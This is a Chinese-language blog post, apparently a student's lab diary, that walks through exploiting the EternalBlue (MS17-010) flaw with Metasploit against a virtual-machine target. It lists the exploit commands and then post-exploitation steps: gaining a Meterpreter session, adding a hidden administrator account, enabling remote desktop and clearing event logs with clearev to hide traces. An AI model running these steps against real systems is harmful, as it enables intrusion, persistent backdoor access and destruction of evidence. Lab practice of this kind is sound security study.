学习日记1:用msf工具利用永恒之蓝漏洞攻击靶机

最新推荐文章于 2024-05-08 17:20:32 发布
最新推荐文章于 2024-05-08 17:20:32 发布
阅读量2.6k 收藏 30
点赞数
分类专栏: kali学习之路 文章标签: 网络 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50888597/article/details/127106520
版权

一、vm虚拟机构建靶机实现互通

两个虚拟机都用NAT转换地址,设置DHCP分配IP,保证两台虚拟机和物理机在一个网段

二、kali上安装msf工具

       apt-get install msf

三、msf工具使用步骤

攻击前记得先ping一下看是否能ping通

1、msfconsole打开msf工具

show targets (用于查看可攻击的系统)

2、search ms17-010 搜索漏洞可攻击的模块

 auxiliary是用来辅助的 exploit开头的是用来直接攻击的(个人理解)

3、use 0(可以直接输序号也可以输入名字)

4、show options 查看所需配置

只需看reauired中是yes的配置就行

 

5、set  rhosts 靶机IP  (端口什么的自己设置命令都一样)

6、配置完成后直接 run 开始攻击

需要注意的是如果靶机开了防火墙,或者下载了补丁可能会显示不成功

攻击成功后会显示meterpreter

 

我们进来后第一步就先提权,输入:getuid(拿到“SYSTEM ”权限)

 7、接下来就可以进行各种操作了

         查看系统信息 sysinfo

        

         screenshot可以截图,结果去路径下就可以找到

        

         反弹Shell

        

         反弹shell后就可以创建一个用户

        net user gg 1234 /add(用户名为gg 密码1234)

        net localgroup administrators gg /add (将新建的普通用户设置为管理员权限)

        net user(查看是否设置成功)

        
       

        开启远程桌面:meterpreter > run post/windows/manage/enable_rdp

        

        然后重新开一个终端建立远程连接用新建的账户登录

 

         注意!!!记得结束后清除日志 clearev

锅巴1232
关注
  • 0
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
无人驾驶算法学习:多传感器融合MSF算法
01-28
无人驾驶技术在近年来得到了快速发展,其中多传感器融合(MSF)算法是实现高精度定位和导航的关键技术之一。本文主要探讨了基于误差状态的卡尔曼滤波(EKF)的MSF算法,特别是在相机和惯性测量单元(IMU)融合方面的...
永恒之蓝靶场
m0_46412408的博客
08-13 1860
模拟永恒之蓝攻击过程的话,需要win7(靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)address 192.168.1.53 //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用。设置攻击主机的ip地址,显示配置信息。............
记一次靶场搭建与渗透测试
qq_41513009的博客
05-12 1152
没办法,大海捞针,测试一下这个CVE:CVE-2020-1472(https://github.com/SecuraBV/CVE-2020-1472)然后利用工具:https://github.com/shack2/javaserializetools/releases,尝试利用这个漏洞:https://github.com/dirkjanm/CVE-2020-1472,成功置空DC密码。存在cve-2016-0638,存在cve-2017-10271,存在cve-2017-3506等。
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 2169
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具
[ MSF使用实例 ] 利用永恒之蓝(MS17-010)漏洞导致windows靶机蓝屏并获取靶机权限
wwwwyyyrre的博客
04-22 2449
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;搭建好环境准备,在WMware虚拟机软件中分别建立以kali和win7为镜像的虚拟机,按照步骤安装好后,配置好虚拟机设置以及网络连接。
网络安全技术新手入门:利用永恒之蓝获取靶机控制权限
weixin_56154577的博客
01-09 1027
本文计较详细地介绍了利用永恒之蓝漏洞对Windows系统进行攻击并且获得靶机控制权限的全过程,适合对网络安全技术感兴趣的新手小伙伴们
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 6132
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
关于永恒之蓝漏洞复现---靶机上创建一个新用户的详细过程
want_to_的博客
05-08 428
关于永恒之蓝漏洞复现---靶机上创建一个新用户的详细过程
永恒之蓝复现kaliwin7
最新发布
07-19
通过本次实验,我们不仅学习到了如何利用永恒之蓝漏洞对 Windows 7 系统进行攻击,更重要的是理解了网络安全的重要性以及如何采取有效措施防止此类攻击的发生。在实际工作中,应定期更新操作系统和应用程序的...
永恒之蓝配置Windows7
10-24
本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 系统。 一、准备工作 在开始之前,我们需要准备好攻击机和靶机攻击机使用 Kali Linux 操作系统,IP 地址为 192.168.1.10,...
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 837
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
永恒之蓝】全网最全的永恒之蓝
喜欢听花海的博客
03-09 1913
永恒之蓝的全过程复现,和对于该漏洞的扩展操作。
【常用工具MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
热门推荐
Fighting_hawk的博客
03-27 2万+
1. 了解MSF框架的使用方法。 2. 了解永恒之蓝漏洞
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4603
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
永恒之蓝漏洞复现
m0_75178803的博客
06-11 418
(控制面板——编辑组——管理工具编辑组策略——本地计算机策略——计算机配置——windows设置——安全设置——本地策略——安全选项)终端输入nmap -sP 对在192.168.75.xxx网段下的所有电脑进行简单的ping扫描(不进行端口扫描)终端输入nmap -p,通过扫描端口,用端口的是否启用来获取靶机ip。创建新的管理员账户,账户名123,密码123(在shell控制台下)查看目标靶机的本地用户(在目标主机的shell控制台下)获取靶机的本地用户的密码(在meterpreter下)
学习笔记 vm虚拟机模拟实战打靶(永恒之蓝)
qq_52360932的博客
12-17 4952
1、查看靶机的ip地址:(即信息收集获取靶机ip,这里我直接在靶机内查看了ip地址,实际上应该进行信息收集获取ip) 2、返回启动kali,进入root,输入netdiscover(这一步是为了查看是否可以搜索到靶机ip) 3、发现靶机后,nmap扫描靶机,发现存在445端口(本人刚学习,使用永恒之蓝进行渗透) nmap -sV -O -A -T4 192.168.108.137 -sV版本识别 -O 是系统识别 -A 是进攻性扫描 -T4 是 以4级的速度扫描 4、启...
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4062
永恒之蓝勒索病毒漏洞复现及防范
msf怎么利用永恒之蓝
06-10
永恒之蓝是指微软Windows操作系统SMBv1协议的漏洞,可以通过Metasploit框架中的EternalBlue exploit模块进行利用。以下是利用永恒之蓝漏洞的一些基本步骤: 1. 启动msfconsole:在终端中输入msfconsole并按Enter键...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

锅巴1232

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值